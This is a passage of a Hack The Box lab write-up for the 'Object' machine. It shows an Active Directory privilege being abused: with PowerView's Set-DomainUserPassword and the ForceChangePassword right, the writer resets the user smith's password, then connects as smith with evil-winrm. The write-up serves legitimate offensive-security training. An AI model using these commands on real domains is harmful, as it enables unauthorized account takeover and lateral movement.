ForceChangePassword
Following up the Help section of BloodHound on the ForceChangePassword privilege
Since the current PowerShell session is already authenticated with the credential of the oliver user, it is unnecessary to create a PSCredential object
*evil-winrm* ps c:\tmp> $UserPassword = ConvertTo-SecureString 'Qwer1234' -AsPlainText -ForceHowever, I still do need to create a $UserPassword object
*evil-winrm* ps c:\tmp> Set-DomainUserPassword -Identity smith -AccountPassword $UserPasswordNow changing the password of the smith user to Qwer1234
WinRM
┌──(kali㉿kali)-[~/archive/htb/labs/object]
└─$ evil-winrm -i jenkins.object.local -u smith -p 'Qwer1234'
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\smith\Documents> whoami
object\smith
*Evil-WinRM* PS C:\Users\smith\Documents> hostname
jenkins
*Evil-WinRM* PS C:\Users\smith\Documents> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . : htb
IPv6 Address. . . . . . . . . . . : dead:beef::20c
IPv6 Address. . . . . . . . . . . : dead:beef::f00b:8831:17ef:6c30
Link-local IPv6 Address . . . . . : fe80::f00b:8831:17ef:6c30%12
IPv4 Address. . . . . . . . . . . : 10.10.11.132
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:d784%12
10.10.10.2Lateral Movement made to the smith user via DACL_Abuse